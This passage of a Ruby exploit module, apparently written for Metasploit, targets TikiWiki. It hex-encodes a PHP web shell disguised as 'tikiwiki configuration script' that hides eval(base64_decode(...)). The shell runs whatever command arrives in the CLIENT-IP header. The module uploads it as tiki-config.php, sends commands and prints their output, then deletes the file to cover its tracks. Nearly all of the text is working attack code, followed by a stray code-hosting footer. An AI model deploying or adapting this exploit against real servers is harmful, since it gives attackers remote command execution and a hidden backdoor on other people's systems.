"\x4c\x20\x50\x55\x42\x4c\x49\x43\x20\x4c\x49\x43\x45\x4e\x53\x45" +
|
||||
"\x2e\x20\x53\x65\x65\x20\x6c\x69\x63\x65\x6e\x73\x65\x2e\x74\x78" +
|
||||
"\x74\x20\x66\x6f\x72\x20\x64\x65\x74\x61\x69\x6c\x73\x2e\x0d\x0a" +
|
||||
"\x0d\x0a\x23\x20\x24\x48\x65\x61\x64\x65\x72\x3a\x20\x2f\x63\x76" +
|
||||
"\x73\x72\x6f\x6f\x74\x2f\x74\x69\x6b\x69\x77\x69\x6b\x69\x2f\x74" +
|
||||
"\x69\x6b\x69\x2f\x62\x61\x6e\x6e\x65\x72\x5f\x69\x6d\x61\x67\x65" +
|
||||
"\x2e\x70\x68\x70\x2c\x76\x20\x31\x2e\x38\x2e\x32\x2e\x35\x20\x32" +
|
||||
"\x30\x30\x35\x2f\x30\x38\x2f\x32\x32\x20\x30\x38\x3a\x30\x30\x3a" +
|
||||
"\x35\x33\x20\x74\x65\x6c\x65\x6e\x69\x65\x6b\x6f\x20\x45\x78\x70" +
|
||||
"\x20\x24\x0d\x0a\x0d\x0a\x2f\x2f\x20\x74\x69\x6b\x69\x77\x69\x6b" +
|
||||
"\x69\x20\x63\x6f\x6e\x66\x69\x67\x75\x72\x61\x74\x69\x6f\x6e\x20" +
|
||||
"\x73\x63\x72\x69\x70\x74\x0d\x0a\x0d\x0a\x65\x76\x61\x6c\x28\x62" +
|
||||
"\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x22\x5a\x58" +
|
||||
"\x4a\x79\x62\x33\x4a\x66\x63\x6d\x56\x77\x62\x33\x4a\x30\x61\x57" +
|
||||
"\x35\x6e\x4b\x44\x41\x70\x4f\x33\x4e\x6c\x64\x46\x39\x30\x61\x57" +
|
||||
"\x31\x6c\x58\x32\x78\x70\x62\x57\x6c\x30\x4b\x44\x41\x70\x4f\x32" +
|
||||
"\x56\x6a\x61\x47\x38\x67\x49\x6d\x31\x35\x58\x32\x52\x6c\x62\x47" +
|
||||
"\x6c\x74\x49\x6a\x74\x77\x59\x58\x4e\x7a\x64\x47\x68\x79\x64\x53" +
|
||||
"\x67\x6b\x58\x31\x4e\x46\x55\x6c\x5a\x46\x55\x6c\x73\x69\x53\x46" +
|
||||
"\x52\x55\x55\x46\x39\x44\x54\x45\x6c\x46\x54\x6c\x52\x66\x53\x56" +
|
||||
"\x41\x69\x58\x53\x6b\x37\x22\x29\x29\x3b\x0d\x0a\x3f\x3e\x0d\x0a"
|
||||
|
||||
data =
|
||||
"-----------------------------7d529a1d23092a\r\n" +
|
||||
"Content-Disposition: form-data; name=\"filepath\"; filename=\"tiki-config.php\";\r\n\r\n" +
|
||||
scode +
|
||||
"\r\n" +
|
||||
"-----------------------------7d529a1d23092a--\r\n"
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => url_jhot,
|
||||
'method' => 'POST',
|
||||
'data' => "#{data}",
|
||||
'headers' =>
|
||||
{
|
||||
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
|
||||
'Content-Type' => 'multipart/form-data; boundary=---------------------------7d529a1d23092a',
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 25)
|
||||
|
||||
if (res and res.message == "OK")
|
||||
print_status("Successfully created temporary file.")
|
||||
else
|
||||
print_status("Error creating temporary file.")
|
||||
end
|
||||
end
|
||||
|
||||
def exe_command(cmd)
|
||||
url_config = datastore['URI'] + "/img/wiki/tiki-config.php"
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => url_config,
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
|
||||
'CLIENT-IP' => "#{cmd};",
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 25)
|
||||
|
||||
if (res and res.message == "OK" and res.body.match(/my_delim/m))
|
||||
print_status("The server returned : #{res.code} #{res.message} (#{res.headers['Server']})")
|
||||
|
||||
cmd_output = res.body.match(/my_delim(.*)/m)
|
||||
|
||||
if (cmd_output)
|
||||
print_status("Command output from the server :")
|
||||
print("\n" + cmd_output[1] + "\n")
|
||||
else
|
||||
print_status("This server may not be vulnerable")
|
||||
end
|
||||
else
|
||||
print_status("No response from the server")
|
||||
end
|
||||
end
|
||||
|
||||
def remove_temp_file
|
||||
url_config = datastore['URI'] + "/img/wiki/tiki-config.php"
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => url_config,
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
|
||||
'CLIENT-IP' => 'rm -f tiki-config.php',
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 25)
|
||||
|
||||
if (res and res.message == "OK")
|
||||
print_status("Successfully remove temporary file.")
|
||||
else
|
||||
print_status("Error removing temporary file.")
|
||||
end
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue